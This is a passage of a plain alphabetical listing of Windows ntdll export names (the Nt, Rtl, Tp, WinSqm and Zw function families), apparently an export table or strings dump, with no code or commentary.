NtQuerySystemEnvironmentValue NtQuerySystemEnvironmentValueEx NtQuerySystemInformation NtQuerySystemInformationEx NtQuerySystemTime NtQueryTimer NtQueryTimerResolution NtQueryValueKey NtQueryVirtualMemory NtQueryVolumeInformationFile NtQueueApcThread NtQueueApcThreadEx NtRaiseException NtRaiseHardError NtReadFile NtReadFileScatter NtReadOnlyEnlistment NtReadRequestData NtReadVirtualMemory NtRecoverEnlistment NtRecoverResourceManager NtRecoverTransactionManager NtRegisterProtocolAddressInformation NtRegisterThreadTerminatePort NtReleaseKeyedEvent NtReleaseMutant NtReleaseSemaphore NtReleaseWorkerFactoryWorker NtRemoveIoCompletion NtRemoveIoCompletionEx NtRemoveProcessDebug NtRenameKey NtRenameTransactionManager NtReplaceKey NtReplacePartitionUnit NtReplyPort NtReplyWaitReceivePort NtReplyWaitReceivePortEx NtReplyWaitReplyPort NtRequestPort NtRequestWaitReplyPort NtResetEvent NtResetWriteWatch NtRestoreKey NtResumeProcess NtResumeThread NtRollbackComplete NtRollbackEnlistment NtRollbackTransaction NtRollforwardTransactionManager NtSaveKey NtSaveKeyEx NtSaveMergedKeys NtSecureConnectPort NtSerializeBoot NtSetBootEntryOrder NtSetBootOptions NtSetContextThread NtSetDebugFilterState NtSetDefaultHardErrorPort NtSetDefaultLocale NtSetDefaultUILanguage NtSetDriverEntryOrder NtSetEaFile NtSetEvent NtSetEventBoostPriority NtSetHighEventPair NtSetHighWaitLowEventPair NtSetInformationDebugObject NtSetInformationEnlistment NtSetInformationFile NtSetInformationJobObject NtSetInformationKey NtSetInformationObject NtSetInformationProcess NtSetInformationResourceManager NtSetInformationThread NtSetInformationToken NtSetInformationTransaction NtSetInformationTransactionManager NtSetInformationWorkerFactory NtSetIntervalProfile NtSetIoCompletion NtSetIoCompletionEx NtSetLdtEntries NtSetLowEventPair NtSetLowWaitHighEventPair NtSetQuotaInformationFile NtSetSecurityObject NtSetSystemEnvironmentValue NtSetSystemEnvironmentValueEx NtSetSystemInformation NtSetSystemPowerState NtSetSystemTime NtSetThreadExecutionState NtSetTimer NtSetTimerEx NtSetTimerResolution NtSetUuidSeed NtSetValueKey NtSetVolumeInformationFile NtShutdownSystem NtShutdownWorkerFactory NtSignalAndWaitForSingleObject NtSinglePhaseReject NtStartProfile NtStopProfile NtSuspendProcess NtSuspendThread NtSystemDebugControl NtTerminateJobObject NtTerminateProcess NtTerminateThread NtTestAlert NtThawRegistry NtThawTransactions NtTraceControl NtTraceEvent NtTranslateFilePath NtUmsThreadYield NtUnloadDriver NtUnloadKey NtUnloadKey2 NtUnloadKeyEx NtUnlockFile NtUnlockVirtualMemory NtUnmapViewOfSection NtVdmControl NtWaitForDebugEvent NtWaitForKeyedEvent NtWaitForMultipleObjects NtWaitForMultipleObjects32 NtWaitForSingleObject NtWaitForWorkViaWorkerFactory NtWaitHighEventPair NtWaitLowEventPair NtWorkerFactoryWorkerReady NtWriteFile NtWriteFileGather NtWriteRequestData NtWriteVirtualMemory NtYieldExecution NtdllDefWindowProc_A NtdllDefWindowProc_W NtdllDialogWndProc_A NtdllDialogWndProc_W PfxFindPrefix PfxInitialize PfxInsertPrefix PfxRemovePrefix RtlAbortRXact RtlAbsoluteToSelfRelativeSD RtlAcquirePebLock RtlAcquirePrivilege RtlAcquireReleaseSRWLockExclusive RtlAcquireResourceExclusive RtlAcquireResourceShared RtlAcquireSRWLockExclusive RtlAcquireSRWLockShared RtlActivateActivationContext RtlActivateActivationContextEx RtlActivateActivationContextUnsafeFast RtlAddAccessAllowedAce RtlAddAccessAllowedAceEx RtlAddAccessAllowedObjectAce RtlAddAccessDeniedAce RtlAddAccessDeniedAceEx RtlAddAccessDeniedObjectAce RtlAddAce RtlAddActionToRXact RtlAddAtomToAtomTable RtlAddAttributeActionToRXact RtlAddAuditAccessAce RtlAddAuditAccessAceEx RtlAddAuditAccessObjectAce RtlAddCompoundAce RtlAddIntegrityLabelToBoundaryDescriptor RtlAddMandatoryAce RtlAddRefActivationContext RtlAddRefMemoryStream RtlAddSIDToBoundaryDescriptor RtlAddVectoredContinueHandler RtlAddVectoredExceptionHandler RtlAddressInSectionTable RtlAdjustPrivilege RtlAllocateActivationContextStack RtlAllocateAndInitializeSid RtlAllocateHandle RtlAllocateHeap RtlAllocateMemoryBlockLookaside RtlAllocateMemoryZone RtlAnsiCharToUnicodeChar RtlAnsiStringToUnicodeSize RtlAnsiStringToUnicodeString RtlAppendAsciizToString RtlAppendPathElement RtlAppendStringToString RtlAppendUnicodeStringToString RtlAppendUnicodeToString RtlApplicationVerifierStop RtlApplyRXact RtlApplyRXactNoFlush RtlAreAllAccessesGranted RtlAreAnyAccessesGranted RtlAreBitsClear RtlAreBitsSet RtlAssert RtlBarrier RtlBarrierForDelete RtlCancelTimer RtlCaptureContext RtlCaptureStackBackTrace RtlCaptureStackContext RtlCharToInteger RtlCheckForOrphanedCriticalSections RtlCheckRegistryKey RtlCheckSandboxedToken RtlCleanUpTEBLangLists RtlClearAllBits RtlClearBits RtlCloneMemoryStream RtlCloneUserProcess RtlCmDecodeMemIoResource RtlCmEncodeMemIoResource RtlCommitDebugInfo RtlCommitMemoryStream RtlCompactHeap RtlCompareAltitudes RtlCompareMemory RtlCompareMemoryUlong RtlCompareString RtlCompareUnicodeString RtlCompareUnicodeStrings RtlCompressBuffer RtlComputeCrc32 RtlComputeImportTableHash RtlComputePrivatizedDllName_U RtlConnectToSm RtlConsoleMultiByteToUnicodeN RtlContractHashTable RtlConvertExclusiveToShared RtlConvertLCIDToString RtlConvertLongToLargeInteger RtlConvertSharedToExclusive RtlConvertSidToUnicodeString RtlConvertToAutoInheritSecurityObject RtlConvertUiListToApiList RtlConvertUlongToLargeInteger RtlCopyContext RtlCopyExtendedContext RtlCopyLuid RtlCopyLuidAndAttributesArray RtlCopyMappedMemory RtlCopyMemoryStreamTo RtlCopyOutOfProcessMemoryStreamTo RtlCopySecurityDescriptor RtlCopySid RtlCopySidAndAttributesArray RtlCopyString RtlCopyUnicodeString RtlCreateAcl RtlCreateActivationContext RtlCreateAndSetSD RtlCreateAtomTable RtlCreateBootStatusDataFile RtlCreateBoundaryDescriptor RtlCreateEnvironment RtlCreateEnvironmentEx RtlCreateHashTable RtlCreateHeap RtlCreateMemoryBlockLookaside RtlCreateMemoryZone RtlCreateProcessParameters RtlCreateProcessParametersEx RtlCreateProcessReflection RtlCreateQueryDebugBuffer RtlCreateRegistryKey RtlCreateSecurityDescriptor RtlCreateServiceSid RtlCreateSystemVolumeInformationFolder RtlCreateTagHeap RtlCreateTimer RtlCreateTimerQueue RtlCreateUnicodeString RtlCreateUnicodeStringFromAsciiz RtlCreateUserProcess RtlCreateUserSecurityObject RtlCreateUserStack RtlCreateUserThread RtlCreateVirtualAccountSid RtlCultureNameToLCID RtlCustomCPToUnicodeN RtlCutoverTimeToSystemTime RtlDeCommitDebugInfo RtlDeNormalizeProcessParams RtlDeactivateActivationContext RtlDeactivateActivationContextUnsafeFast RtlDebugPrintTimes RtlDecodePointer RtlDecodeSystemPointer RtlDecompressBuffer RtlDecompressFragment RtlDefaultNpAcl RtlDelete RtlDeleteAce RtlDeleteAtomFromAtomTable RtlDeleteBarrier RtlDeleteBoundaryDescriptor RtlDeleteCriticalSection RtlDeleteElementGenericTable RtlDeleteElementGenericTableAvl RtlDeleteHashTable RtlDeleteNoSplay RtlDeleteRegistryValue RtlDeleteResource RtlDeleteSecurityObject RtlDeleteTimer RtlDeleteTimerQueue RtlDeleteTimerQueueEx RtlDeregisterSecureMemoryCacheCallback RtlDeregisterWait RtlDeregisterWaitEx RtlDestroyAtomTable RtlDestroyEnvironment RtlDestroyHandleTable RtlDestroyHeap RtlDestroyMemoryBlockLookaside RtlDestroyMemoryZone RtlDestroyProcessParameters RtlDestroyQueryDebugBuffer RtlDetectHeapLeaks RtlDetermineDosPathNameType_U RtlDisableThreadProfiling RtlDllShutdownInProgress RtlDnsHostNameToComputerName RtlDoesFileExists_U RtlDosApplyFileIsolationRedirection_Ustr RtlDosPathNameToNtPathName_U RtlDosPathNameToNtPathName_U_WithStatus RtlDosPathNameToRelativeNtPathName_U RtlDosPathNameToRelativeNtPathName_U_WithStatus RtlDosSearchPath_U RtlDosSearchPath_Ustr RtlDowncaseUnicodeChar RtlDowncaseUnicodeString RtlDumpResource RtlDuplicateUnicodeString RtlEmptyAtomTable RtlEnableEarlyCriticalSectionEventCreation RtlEnableThreadProfiling RtlEncodePointer RtlEncodeSystemPointer RtlEndEnumerationHashTable RtlEndWeakEnumerationHashTable RtlEnlargedIntegerMultiply RtlEnlargedUnsignedDivide RtlEnlargedUnsignedMultiply RtlEnterCriticalSection RtlEnumProcessHeaps RtlEnumerateEntryHashTable RtlEnumerateGenericTable RtlEnumerateGenericTableAvl RtlEnumerateGenericTableLikeADirectory RtlEnumerateGenericTableWithoutSplaying RtlEnumerateGenericTableWithoutSplayingAvl RtlEqualComputerName RtlEqualDomainName RtlEqualLuid RtlEqualPrefixSid RtlEqualSid RtlEqualString RtlEqualUnicodeString RtlEraseUnicodeString RtlEthernetAddressToStringA RtlEthernetAddressToStringW RtlEthernetStringToAddressA RtlEthernetStringToAddressW RtlExitUserProcess RtlExitUserThread RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings_U RtlExpandHashTable RtlExtendMemoryBlockLookaside RtlExtendMemoryZone RtlExtendedIntegerMultiply RtlExtendedLargeIntegerDivide RtlExtendedMagicDivide RtlFillMemory RtlFillMemoryUlong RtlFillMemoryUlonglong RtlFinalReleaseOutOfProcessMemoryStream RtlFindAceByType RtlFindActivationContextSectionGuid RtlFindActivationContextSectionString RtlFindCharInUnicodeString RtlFindClearBits RtlFindClearBitsAndSet RtlFindClearRuns RtlFindClosestEncodableLength RtlFindLastBackwardRunClear RtlFindLeastSignificantBit RtlFindLongestRunClear RtlFindMessage RtlFindMostSignificantBit RtlFindNextForwardRunClear RtlFindSetBits RtlFindSetBitsAndClear RtlFirstEntrySList RtlFirstFreeAce RtlFlsAlloc RtlFlsFree RtlFlushSecureMemoryCache RtlFormatCurrentUserKeyPath RtlFormatMessage RtlFormatMessageEx RtlFreeActivationContextStack RtlFreeAnsiString RtlFreeHandle RtlFreeHeap RtlFreeMemoryBlockLookaside RtlFreeOemString RtlFreeSid RtlFreeThreadActivationContextStack RtlFreeUnicodeString RtlFreeUserStack RtlGUIDFromString RtlGenerate8dot3Name RtlGetAce RtlGetActiveActivationContext RtlGetCallersAddress RtlGetCompressionWorkSpaceSize RtlGetControlSecurityDescriptor RtlGetCriticalSectionRecursionCount RtlGetCurrentDirectory_U RtlGetCurrentPeb RtlGetCurrentProcessorNumber RtlGetCurrentProcessorNumberEx RtlGetCurrentTransaction RtlGetDaclSecurityDescriptor RtlGetElementGenericTable RtlGetElementGenericTableAvl RtlGetEnabledExtendedFeatures RtlGetExtendedContextLength RtlGetExtendedFeaturesMask RtlGetFileMUIPath RtlGetFrame RtlGetFullPathName_U RtlGetFullPathName_UEx RtlGetFullPathName_UstrEx RtlGetGroupSecurityDescriptor RtlGetIntegerAtom RtlGetLastNtStatus RtlGetLastWin32Error RtlGetLengthWithoutLastFullDosOrNtPathElement RtlGetLengthWithoutTrailingPathSeperators RtlGetLocaleFileMappingAddress RtlGetLongestNtPathLength RtlGetNativeSystemInformation RtlGetNextEntryHashTable RtlGetNtGlobalFlags RtlGetNtProductType RtlGetNtVersionNumbers RtlGetOwnerSecurityDescriptor RtlGetParentLocaleName RtlGetProcessHeaps RtlGetProcessPreferredUILanguages RtlGetProductInfo RtlGetSaclSecurityDescriptor RtlGetSecurityDescriptorRMControl RtlGetSetBootStatusData RtlGetSystemPreferredUILanguages RtlGetThreadErrorMode RtlGetThreadLangIdByIndex RtlGetThreadPreferredUILanguages RtlGetUILanguageInfo RtlGetUnloadEventTrace RtlGetUnloadEventTraceEx RtlGetUserInfoHeap RtlGetUserPreferredUILanguages RtlGetVersion RtlHashUnicodeString RtlHeapTrkInitialize RtlIdentifierAuthoritySid RtlIdnToAscii RtlIdnToNameprepUnicode RtlIdnToUnicode RtlImageDirectoryEntryToData RtlImageNtHeader RtlImageNtHeaderEx RtlImageRvaToSection RtlImageRvaToVa RtlImpersonateSelf RtlImpersonateSelfEx RtlInitAnsiString RtlInitAnsiStringEx RtlInitBarrier RtlInitCodePageTable RtlInitEnumerationHashTable RtlInitMemoryStream RtlInitNlsTables RtlInitOutOfProcessMemoryStream RtlInitString RtlInitUnicodeString RtlInitUnicodeStringEx RtlInitWeakEnumerationHashTable RtlInitializeAtomPackage RtlInitializeBitMap RtlInitializeConditionVariable RtlInitializeContext RtlInitializeCriticalSection RtlInitializeCriticalSectionAndSpinCount RtlInitializeCriticalSectionEx RtlInitializeExceptionChain RtlInitializeExtendedContext RtlInitializeGenericTable RtlInitializeGenericTableAvl RtlInitializeHandleTable RtlInitializeNtUserPfn RtlInitializeRXact RtlInitializeResource RtlInitializeSListHead RtlInitializeSRWLock RtlInitializeSid RtlInsertElementGenericTable RtlInsertElementGenericTableAvl RtlInsertElementGenericTableFull RtlInsertElementGenericTableFullAvl RtlInsertEntryHashTable RtlInt64ToUnicodeString RtlIntegerToChar RtlIntegerToUnicodeString RtlInterlockedClearBitRun RtlInterlockedCompareExchange64 RtlInterlockedFlushSList RtlInterlockedPopEntrySList RtlInterlockedPushEntrySList RtlInterlockedPushListSList RtlInterlockedSetBitRun RtlIoDecodeMemIoResource RtlIoEncodeMemIoResource RtlIpv4AddressToStringA RtlIpv4AddressToStringExA RtlIpv4AddressToStringExW RtlIpv4AddressToStringW RtlIpv4StringToAddressA RtlIpv4StringToAddressExA RtlIpv4StringToAddressExW RtlIpv4StringToAddressW RtlIpv6AddressToStringA RtlIpv6AddressToStringExA RtlIpv6AddressToStringExW RtlIpv6AddressToStringW RtlIpv6StringToAddressA RtlIpv6StringToAddressExA RtlIpv6StringToAddressExW RtlIpv6StringToAddressW RtlIsActivationContextActive RtlIsCriticalSectionLocked RtlIsCriticalSectionLockedByThread RtlIsCurrentThreadAttachExempt RtlIsDosDeviceName_U RtlIsGenericTableEmpty RtlIsGenericTableEmptyAvl RtlIsNameInExpression RtlIsNameLegalDOS8Dot3 RtlIsNormalizedString RtlIsTextUnicode RtlIsThreadWithinLoaderCallout RtlIsValidHandle RtlIsValidIndexHandle RtlIsValidLocaleName RtlKnownExceptionFilter RtlLCIDToCultureName RtlLargeIntegerAdd RtlLargeIntegerArithmeticShift RtlLargeIntegerDivide RtlLargeIntegerNegate RtlLargeIntegerShiftLeft RtlLargeIntegerShiftRight RtlLargeIntegerSubtract RtlLargeIntegerToChar RtlLcidToLocaleName RtlLeaveCriticalSection RtlLengthRequiredSid RtlLengthSecurityDescriptor RtlLengthSid RtlLoadString RtlLocalTimeToSystemTime RtlLocaleNameToLcid RtlLocateExtendedFeature RtlLocateLegacyContext RtlLockBootStatusData RtlLockCurrentThread RtlLockHeap RtlLockMemoryBlockLookaside RtlLockMemoryStreamRegion RtlLockMemoryZone RtlLockModuleSection RtlLogStackBackTrace RtlLookupAtomInAtomTable RtlLookupElementGenericTable RtlLookupElementGenericTableAvl RtlLookupElementGenericTableFull RtlLookupElementGenericTableFullAvl RtlLookupEntryHashTable RtlMakeSelfRelativeSD RtlMapGenericMask RtlMapSecurityErrorToNtStatus RtlMoveMemory RtlMultiAppendUnicodeStringBuffer RtlMultiByteToUnicodeN RtlMultiByteToUnicodeSize RtlMultipleAllocateHeap RtlMultipleFreeHeap RtlNewInstanceSecurityObject RtlNewSecurityGrantedAccess RtlNewSecurityObject RtlNewSecurityObjectEx RtlNewSecurityObjectWithMultipleInheritance RtlNormalizeProcessParams RtlNormalizeString RtlNtPathNameToDosPathName RtlNtStatusToDosError RtlNtStatusToDosErrorNoTeb RtlNumberGenericTableElements RtlNumberGenericTableElementsAvl RtlNumberOfClearBits RtlNumberOfSetBits RtlNumberOfSetBitsUlongPtr RtlOemStringToUnicodeSize RtlOemStringToUnicodeString RtlOemToUnicodeN RtlOpenCurrentUser RtlOwnerAcesPresent RtlPcToFileHeader RtlPinAtomInAtomTable RtlPopFrame RtlPrefixString RtlPrefixUnicodeString RtlProcessFlsData RtlProtectHeap RtlPushFrame RtlQueryActivationContextApplicationSettings RtlQueryAtomInAtomTable RtlQueryCriticalSectionOwner RtlQueryDepthSList RtlQueryDynamicTimeZoneInformation RtlQueryElevationFlags RtlQueryEnvironmentVariable RtlQueryEnvironmentVariable_U RtlQueryHeapInformation RtlQueryInformationAcl RtlQueryInformationActivationContext RtlQueryInformationActiveActivationContext RtlQueryInterfaceMemoryStream RtlQueryModuleInformation RtlQueryPerformanceCounter RtlQueryPerformanceFrequency RtlQueryProcessBackTraceInformation RtlQueryProcessDebugInformation RtlQueryProcessHeapInformation RtlQueryProcessLockInformation RtlQueryRegistryValues RtlQuerySecurityObject RtlQueryTagHeap RtlQueryThreadProfiling RtlQueryTimeZoneInformation RtlQueueApcWow64Thread RtlQueueWorkItem RtlRaiseException RtlRaiseStatus RtlRandom RtlRandomEx RtlReAllocateHeap RtlReadMemoryStream RtlReadOutOfProcessMemoryStream RtlReadThreadProfilingData RtlRealPredecessor RtlRealSuccessor RtlRegisterSecureMemoryCacheCallback RtlRegisterThreadWithCsrss RtlRegisterWait RtlReleaseActivationContext RtlReleaseMemoryStream RtlReleasePebLock RtlReleasePrivilege RtlReleaseRelativeName RtlReleaseResource RtlReleaseSRWLockExclusive RtlReleaseSRWLockShared RtlRemoteCall RtlRemoveEntryHashTable RtlRemovePrivileges RtlRemoveVectoredContinueHandler RtlRemoveVectoredExceptionHandler RtlReplaceSidInSd RtlReportException RtlReportSilentProcessExit RtlReportSqmEscalation RtlResetMemoryBlockLookaside RtlResetMemoryZone RtlResetRtlTranslations RtlRestoreLastWin32Error RtlRetrieveNtUserPfn RtlRevertMemoryStream RtlRunDecodeUnicodeString RtlRunEncodeUnicodeString RtlRunOnceBeginInitialize RtlRunOnceComplete RtlRunOnceExecuteOnce RtlRunOnceInitialize RtlSecondsSince1970ToTime RtlSecondsSince1980ToTime RtlSeekMemoryStream RtlSelfRelativeToAbsoluteSD RtlSelfRelativeToAbsoluteSD2 RtlSendMsgToSm RtlSetAllBits RtlSetAttributesSecurityDescriptor RtlSetBits RtlSetControlSecurityDescriptor RtlSetCriticalSectionSpinCount RtlSetCurrentDirectory_U RtlSetCurrentEnvironment RtlSetCurrentTransaction RtlSetDaclSecurityDescriptor RtlSetDynamicTimeZoneInformation RtlSetEnvironmentStrings RtlSetEnvironmentVar RtlSetEnvironmentVariable RtlSetExtendedFeaturesMask RtlSetGroupSecurityDescriptor RtlSetHeapInformation RtlSetInformationAcl RtlSetIoCompletionCallback RtlSetLastWin32Error RtlSetLastWin32ErrorAndNtStatusFromNtStatus RtlSetMemoryStreamSize RtlSetOwnerSecurityDescriptor RtlSetProcessDebugInformation RtlSetProcessIsCritical RtlSetProcessPreferredUILanguages RtlSetSaclSecurityDescriptor RtlSetSecurityDescriptorRMControl RtlSetSecurityObject RtlSetSecurityObjectEx RtlSetThreadErrorMode RtlSetThreadIsCritical RtlSetThreadPoolStartFunc RtlSetThreadPreferredUILanguages RtlSetTimeZoneInformation RtlSetTimer RtlSetUnhandledExceptionFilter RtlSetUserFlagsHeap RtlSetUserValueHeap RtlSidDominates RtlSidEqualLevel RtlSidHashInitialize RtlSidHashLookup RtlSidIsHigherLevel RtlSizeHeap RtlSleepConditionVariableCS RtlSleepConditionVariableSRW RtlSplay RtlStartRXact RtlStatMemoryStream RtlStringFromGUID RtlSubAuthorityCountSid RtlSubAuthoritySid RtlSubtreePredecessor RtlSubtreeSuccessor RtlSystemTimeToLocalTime RtlTestBit RtlTimeFieldsToTime RtlTimeToElapsedTimeFields RtlTimeToSecondsSince1970 RtlTimeToSecondsSince1980 RtlTimeToTimeFields RtlTraceDatabaseAdd RtlTraceDatabaseCreate RtlTraceDatabaseDestroy RtlTraceDatabaseEnumerate RtlTraceDatabaseFind RtlTraceDatabaseLock RtlTraceDatabaseUnlock RtlTraceDatabaseValidate RtlTryAcquirePebLock RtlTryAcquireSRWLockExclusive RtlTryAcquireSRWLockShared RtlTryEnterCriticalSection RtlUTF8ToUnicodeN RtlUlongByteSwap RtlUlonglongByteSwap RtlUnhandledExceptionFilter RtlUnhandledExceptionFilter2 RtlUnicodeStringToAnsiSize RtlUnicodeStringToAnsiString RtlUnicodeStringToCountedOemString RtlUnicodeStringToInteger RtlUnicodeStringToOemSize RtlUnicodeStringToOemString RtlUnicodeToCustomCPN RtlUnicodeToMultiByteN RtlUnicodeToMultiByteSize RtlUnicodeToOemN RtlUnicodeToUTF8N RtlUniform RtlUnlockBootStatusData RtlUnlockCurrentThread RtlUnlockHeap RtlUnlockMemoryBlockLookaside RtlUnlockMemoryStreamRegion RtlUnlockMemoryZone RtlUnlockModuleSection RtlUnwind RtlUpcaseUnicodeChar RtlUpcaseUnicodeString RtlUpcaseUnicodeStringToAnsiString RtlUpcaseUnicodeStringToCountedOemString RtlUpcaseUnicodeStringToOemString RtlUpcaseUnicodeToCustomCPN RtlUpcaseUnicodeToMultiByteN RtlUpcaseUnicodeToOemN RtlUpdateClonedCriticalSection RtlUpdateClonedSRWLock RtlUpdateTimer RtlUpperChar RtlUpperString RtlUserThreadStart RtlUshortByteSwap RtlValidAcl RtlValidRelativeSecurityDescriptor RtlValidSecurityDescriptor RtlValidSid RtlValidateHeap RtlValidateProcessHeaps RtlValidateUnicodeString RtlVerifyVersionInfo RtlWakeAllConditionVariable RtlWakeConditionVariable RtlWalkFrameChain RtlWalkHeap RtlWeaklyEnumerateEntryHashTable RtlWerpReportException RtlWow64CallFunction64 RtlWow64EnableFsRedirection RtlWow64EnableFsRedirectionEx RtlWriteMemoryStream RtlWriteRegistryValue RtlZeroHeap RtlZeroMemory RtlZombifyActivationContext RtlpApplyLengthFunction RtlpCheckDynamicTimeZoneInformation RtlpCleanupRegistryKeys RtlpConvertCultureNamesToLCIDs RtlpConvertLCIDsToCultureNames RtlpCreateProcessRegistryInfo RtlpEnsureBufferSize RtlpGetLCIDFromLangInfoNode RtlpGetNameFromLangInfoNode RtlpGetSystemDefaultUILanguage RtlpGetUserOrMachineUILanguage4NLS RtlpInitializeLangRegistryInfo RtlpIsQualifiedLanguage RtlpLoadMachineUIByPolicy RtlpLoadUserUIByPolicy RtlpMuiFreeLangRegistryInfo RtlpMuiRegCreateRegistryInfo RtlpMuiRegFreeRegistryInfo RtlpMuiRegLoadRegistryInfo RtlpNotOwnerCriticalSection RtlpNtCreateKey RtlpNtEnumerateSubKey RtlpNtMakeTemporaryKey RtlpNtOpenKey RtlpNtQueryValueKey RtlpNtSetValueKey RtlpQueryDefaultUILanguage RtlpRefreshCachedUILanguage RtlpSetInstallLanguage RtlpSetPreferredUILanguages RtlpSetUserPreferredUILanguages RtlpUnWaitCriticalSection RtlpVerifyAndCommitUILanguageSettings RtlpWaitForCriticalSection RtlxAnsiStringToUnicodeSize RtlxOemStringToUnicodeSize RtlxUnicodeStringToAnsiSize RtlxUnicodeStringToOemSize SbExecuteProcedure SbSelectProcedure ShipAssert ShipAssertGetBufferInfo ShipAssertMsgA ShipAssertMsgW TpAllocAlpcCompletion TpAllocAlpcCompletionEx TpAllocCleanupGroup TpAllocIoCompletion TpAllocPool TpAllocTimer TpAllocWait TpAllocWork TpAlpcRegisterCompletionList TpAlpcUnregisterCompletionList TpCallbackIndependent TpCallbackLeaveCriticalSectionOnCompletion TpCallbackMayRunLong TpCallbackReleaseMutexOnCompletion TpCallbackReleaseSemaphoreOnCompletion TpCallbackSetEventOnCompletion TpCallbackUnloadDllOnCompletion TpCancelAsyncIoOperation TpCaptureCaller TpCheckTerminateWorker TpDbgDumpHeapUsage TpDbgSetLogRoutine TpDisablePoolCallbackChecks TpDisassociateCallback TpIsTimerSet TpPostWork TpQueryPoolStackInformation TpReleaseAlpcCompletion TpReleaseCleanupGroup TpReleaseCleanupGroupMembers TpReleaseIoCompletion TpReleasePool TpReleaseTimer TpReleaseWait TpReleaseWork TpSetDefaultPoolMaxThreads TpSetDefaultPoolStackInformation TpSetPoolMaxThreads TpSetPoolMinThreads TpSetPoolStackInformation TpSetTimer TpSetWait TpSimpleTryPost TpStartAsyncIoOperation TpWaitForAlpcCompletion TpWaitForIoCompletion TpWaitForTimer TpWaitForWait TpWaitForWork VerSetConditionMask WerReportSQMEvent WinSqmAddToAverageDWORD WinSqmAddToStream WinSqmAddToStreamEx WinSqmCheckEscalationAddToStreamEx WinSqmCheckEscalationSetDWORD WinSqmCheckEscalationSetDWORD64 WinSqmCheckEscalationSetString WinSqmCommonDatapointDelete WinSqmCommonDatapointSetDWORD WinSqmCommonDatapointSetDWORD64 WinSqmCommonDatapointSetStreamEx WinSqmCommonDatapointSetString WinSqmEndSession WinSqmEventEnabled WinSqmEventWrite WinSqmGetEscalationRuleStatus WinSqmGetInstrumentationProperty WinSqmIncrementDWORD WinSqmIsOptedIn WinSqmIsOptedInEx WinSqmSetDWORD WinSqmSetDWORD64 WinSqmSetEscalationInfo WinSqmSetIfMaxDWORD WinSqmSetIfMinDWORD WinSqmSetString WinSqmStartSession ZwAcceptConnectPort ZwAccessCheck ZwAccessCheckAndAuditAlarm ZwAccessCheckByType ZwAccessCheckByTypeAndAuditAlarm ZwAccessCheckByTypeResultList ZwAccessCheckByTypeResultListAndAuditAlarm ZwAccessCheckByTypeResultListAndAuditAlarmByHandle ZwAddAtom ZwAddBootEntry ZwAddDriverEntry ZwAdjustGroupsToken ZwAdjustPrivilegesToken ZwAlertResumeThread ZwAlertThread ZwAllocateLocallyUniqueId ZwAllocateReserveObject ZwAllocateUserPhysicalPages ZwAllocateUuids ZwAllocateVirtualMemory ZwAlpcAcceptConnectPort ZwAlpcCancelMessage ZwAlpcConnectPort ZwAlpcCreatePort ZwAlpcCreatePortSection ZwAlpcCreateResourceReserve ZwAlpcCreateSectionView ZwAlpcCreateSecurityContext ZwAlpcDeletePortSection ZwAlpcDeleteResourceReserve ZwAlpcDeleteSectionView ZwAlpcDeleteSecurityContext ZwAlpcDisconnectPort ZwAlpcImpersonateClientOfPort ZwAlpcOpenSenderProcess ZwAlpcOpenSenderThread ZwAlpcQueryInformation ZwAlpcQueryInformationMessage ZwAlpcRevokeSecurityContext ZwAlpcSendWaitReceivePort ZwAlpcSetInformation ZwApphelpCacheControl ZwAreMappedFilesTheSame ZwAssignProcessToJobObject ZwCallbackReturn ZwCancelIoFile ZwCancelIoFileEx ZwCancelSynchronousIoFile ZwCancelTimer ZwClearEvent ZwClose ZwCloseObjectAuditAlarm ZwCommitComplete ZwCommitEnlistment ZwCommitTransaction ZwCompactKeys ZwCompareTokens ZwCompleteConnectPort ZwCompressKey ZwConnectPort ZwContinue ZwCreateDebugObject ZwCreateDirectoryObject ZwCreateEnlistment ZwCreateEvent ZwCreateEventPair ZwCreateFile ZwCreateIoCompletion ZwCreateJobObject ZwCreateJobSet ZwCreateKey ZwCreateKeyTransacted ZwCreateKeyedEvent ZwCreateMailslotFile ZwCreateMutant ZwCreateNamedPipeFile ZwCreatePagingFile ZwCreatePort ZwCreatePrivateNamespace ZwCreateProcess ZwCreateProcessEx ZwCreateProfile ZwCreateProfileEx ZwCreateResourceManager ZwCreateSection ZwCreateSemaphore ZwCreateSymbolicLinkObject ZwCreateThread ZwCreateThreadEx ZwCreateTimer ZwCreateToken ZwCreateTransaction ZwCreateTransactionManager ZwCreateUserProcess ZwCreateWaitablePort ZwCreateWorkerFactory ZwDebugActiveProcess ZwDebugContinue ZwDelayExecution ZwDeleteAtom ZwDeleteBootEntry ZwDeleteDriverEntry ZwDeleteFile ZwDeleteKey ZwDeleteObjectAuditAlarm ZwDeletePrivateNamespace ZwDeleteValueKey ZwDeviceIoControlFile ZwDisableLastKnownGood ZwDisplayString ZwDrawText ZwDuplicateObject ZwDuplicateToken ZwEnableLastKnownGood ZwEnumerateBootEntries ZwEnumerateDriverEntries ZwEnumerateKey ZwEnumerateSystemEnvironmentValuesEx ZwEnumerateTransactionObject ZwEnumerateValueKey ZwExtendSection ZwFilterToken ZwFindAtom ZwFlushBuffersFile ZwFlushInstallUILanguage ZwFlushInstructionCache ZwFlushKey ZwFlushProcessWriteBuffers ZwFlushVirtualMemory ZwFlushWriteBuffer ZwFreeUserPhysicalPages ZwFreeVirtualMemory ZwFreezeRegistry ZwFreezeTransactions ZwFsControlFile ZwGetContextThread ZwGetCurrentProcessorNumber ZwGetDevicePowerState ZwGetMUIRegistryInfo ZwGetNextProcess ZwGetNextThread ZwGetNlsSectionPtr ZwGetNotificationResourceManager ZwGetPlugPlayEvent ZwGetWriteWatch ZwImpersonateAnonymousToken ZwImpersonateClientOfPort ZwImpersonateThread ZwInitializeNlsFiles ZwInitializeRegistry ZwInitiatePowerAction ZwIsProcessInJob ZwIsSystemResumeAutomatic ZwIsUILanguageComitted ZwListenPort ZwLoadDriver ZwLoadKey ZwLoadKey2 ZwLoadKeyEx ZwLockFile ZwLockProductActivationKeys ZwLockRegistryKey ZwLockVirtualMemory ZwMakePermanentObject ZwMakeTemporaryObject ZwMapCMFModule ZwMapUserPhysicalPages ZwMapUserPhysicalPagesScatter ZwMapViewOfSection ZwModifyBootEntry ZwModifyDriverEntry ZwNotifyChangeDirectoryFile ZwNotifyChangeKey ZwNotifyChangeMultipleKeys ZwNotifyChangeSession ZwOpenDirectoryObject ZwOpenEnlistment ZwOpenEvent ZwOpenEventPair ZwOpenFile ZwOpenIoCompletion ZwOpenJobObject ZwOpenKey ZwOpenKeyEx ZwOpenKeyTransacted ZwOpenKeyTransactedEx ZwOpenKeyedEvent ZwOpenMutant ZwOpenObjectAuditAlarm ZwOpenPrivateNamespace ZwOpenProcess 